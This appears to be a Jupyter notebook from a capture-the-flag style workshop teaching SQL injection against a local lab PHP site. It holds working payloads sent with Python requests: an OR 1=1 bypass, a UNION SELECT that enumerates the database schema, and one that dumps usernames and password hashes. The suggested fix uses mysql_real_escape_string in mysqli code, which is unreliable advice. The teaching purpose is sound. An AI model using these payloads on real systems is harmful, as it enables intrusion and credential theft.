# WORKSHOP 1: Web Penetration Testing 1
## Part one: SQL injection
In the first exercize, we'll be doing the "hello world" of injection attacks. The first page, "Home" uses a PHP backend which makes queries to a SQL server for data. Let's take a look:

In [8]:
from IPython.display import IFrame, HTML

# I'm declaring URL as a global variable because the workshop
# is located on a local IP which is subject to change.
# Make sure you run this code first to declare the variable.
URL = 'http://172.16.4.60/ws1/index.php'

IFrame(URL, width='100%', height=400)

### Analysis
To get a better idea of what's happenning with the search box, let's look at the html:
```html
<h2>Search</h2>
 <form action="index.php" method="post">
   <label for="name">Color Search</label>
   <input type="text" id="colorsearch" name="colorsearch">
</form>
```
`method="post"` tells us that the query is making an HTML POST request. This means that the request data is passed along in the body of the request, rather than the request URL (Request types will be covered in more detail next workshop, but for now just know that this is the right request type to use here),

`name="colorsearch"` tells us that the parameter we're POSTing is titled "colorsearch". This is the parameter the html form is filling and sending to the server each time you type something in the search field and hit enter.

The first thing we'll do is write some python code to automate this request process. For a problem like this it's perfectly reasonable to do the whole thing in-browser, but we'll need Python Requests for next three pages so let's start using it now.

In [9]:
import requests

response = requests.get(URL)
display(HTML(response.text))

Great! It doesn't look pretty, but this'll do. Recall that we're making a POST request. Let's change the Python Requests code to match that:

In [10]:
# Here's our POST payload:
payload = {"colorsearch" : "red"}
response = requests.post(URL, data=payload)
display(HTML(response.text))

Red,,6/10


Try changing "red" to "blue" to make sure you have a good idea of how this is working.

So, what's the security issue here? You can't see it without having access to the server, but here's what the PHP code handling that request looks like:
```PHP
// Get results from MySQL
\$link = mysqli_connect("127.0.0.1","ws1home","<password>","workshop1");
\$color = \$_POST["colorsearch"];
\$query = "select * from colors where cname = '" . \$color . "';";
\$result = \$link->query(\$query);

// Print out table containing results:
echo "<table>\n";
while (\$row = \$result->fetch_row()) {
    echo "<tr><td>" . \$row[0] . "</td><td style='background-color:#" . \$row[1]
         . "; width:50px;'></td><td>" . \$row[2] . "/10</td></tr>\n";
}
echo "</table>\n";

mysqli_close(\$link);
```
(Note: the \\\$ are due to issues with Jupyter code markdown and MathJax. The actual code has no backslashes)

The problem code is here:
```PHP
\$color = \$_POST["colorsearch"];
\$query = "select * from colors where cname = '" . \$color . "';";
```
We're taking the raw contents of `colorsearch`, then dumping them into the following query:
```MySQL
SELECT * FROM colors WHERE cname='<input>';
```
Because the input is not sanitized in any way, there's nothing to stop the attacker from using SQL special characters in their request. For example, an input of `' OR 1=1` generates the following SQL query:
```MySQL
SELECT * FROM colors WHERE cname='' OR 1=1';
```
That stray apostrophe is going to cause issues, but because the comment symbol isn't filtered out either we can simply add a comment to our input and get rid of it: `' OR 1=1; #`. Now, the query looks like this:
```MySQL
SELECT * FROM colors WHERE cname='' OR 1=1; #';
```
`#` is a comment in MySQL, so everything after it is ignored. Our query is therefore simply:
```MySQL
SELECT * FROM colors WHERE cname='' OR 1=1;
```
### Attack
Let's try it with the python code:

In [11]:
payload = {"colorsearch" : "' OR 1=1; #"}
response = requests.post(URL, data=payload)
display(HTML(response.text))

White,,7/10
Silver,,6/10
Red,,6/10
Olive,,5/10
Yellow,,7/10
Lime,,6/10
Green,,7/10
Blue,,7/10
Navy,,8/10
Purple,,8/10


Sure enough, all the colors show up. This is not the intended functionality of the service, so there's already a fairly serious security issue here. This isn't the worst of it though; this one vulnerability is actually enough for us to extract information from other tables. Now that we know we can perform an injection, we can start looking at more interesting information:

In [12]:
# My query is now so long that I'm wrapping it to 2 lines
# The \ just tells python to act like there isn't a newline
query = "' UNION SELECT table_name, 1, column_name FROM information_schema.columns " \
        + "WHERE table_schema NOT IN ('sys', 'information_schema', 'performance_schema','mysql'); #"
    
payload = {"colorsearch" : query}
response = requests.post(URL, data=payload)
display(HTML(response.text))

colors,,cname/10
colors,,code/10
colors,,rating/10
users1,,username/10
users1,,password/10


Woah, what just happened?

This workshop is focusing mainly on concepts rather than specific attacks so I won't go too far into the weeds, but here's the basics of what that injection is doing:

- `UNION`: This combines the outputs of two queries into a single table. I don't care about what's in the colors table, but we can't get rid of that part of the query; instead, I UNION the result of the query I don't care about with a new query, which I do care about.

- `FROM information_schema.columns`: Skipping ahead a bit, we find the database and table I'm selecting from. MySQL syntax is `<database name>.<table name>`, so I'm selecting from the `columns` table in the `information_schema` database. `information_schema` contains all of MySQL's metadata. We can go here to find out what other interesting tables to SELECT from.

- `SELECT table_name, 1, column_name`: So, where did these columns come from and why am I selecting `1`? The goal of this query is to get all the names of all the columns for all the talbes. `table_name` and `column_name` are simply columns in the `columns` table containing information I need. The `1` part doesn't actually mean anything, but a `UNION` query only works if the 2 tables being combined have the same number of columns. The `colors` table has 3 columns, so I add an extra column containing nothing but 1s to make sure everything lines up.

- `WHERE table_schema NOT IN ('sys', 'information_schema', 'performance_schema','mysql')`: So what's this mess? This is some MySQL specific filtering which basically just gets rid of anything from databases we don't care about. It's a mess, but if you delete this part you'll see why I'm inluding it

Now, let's look at what this result is actually telling us. We already know about the `colors` table, so that isn't very interesting. The users table, on the other hand, seems like it might have some valuable information. Let's select from that table.

In [15]:
query = "' UNION SELECT username, 1, password FROM users1; #"
    
payload = {"colorsearch" : query}
response = requests.post(URL, data=payload)
display(HTML(response.text))

Alice,,5f4dcc3b5aa765d61d8327deb882cf99/10
Bob,,e10adc3949ba59abbe56e057f20f883e/10
Carol,,1e6947ac7fb3a9529a9726eb692c8cc5/10
Dan,,32250170a0dca92d53ec9624f336ca24/10
FLAG,,1jHz6AdGFxHXNlf5/10


The "/10" is only there because the webpage is expected a number out of 10 to place on the page. Congratulations! You've successfully found the flag for page 1.

### Defense
Here's how you can protect against this attack:

Change `$color = $_POST["colorsearch"];` to `$color = mysql_real_escape_string($_POST["colorsearch"]);`.

That tiny change is all you need to do to fix one of the most common and impactful attacks on the web. Sanitizing every input you take in is both the most basic and most critical security measure.

<i>(Note: using prepared statements is an even better way to deal with injection, but that's out of the scope of this workshop)</i>
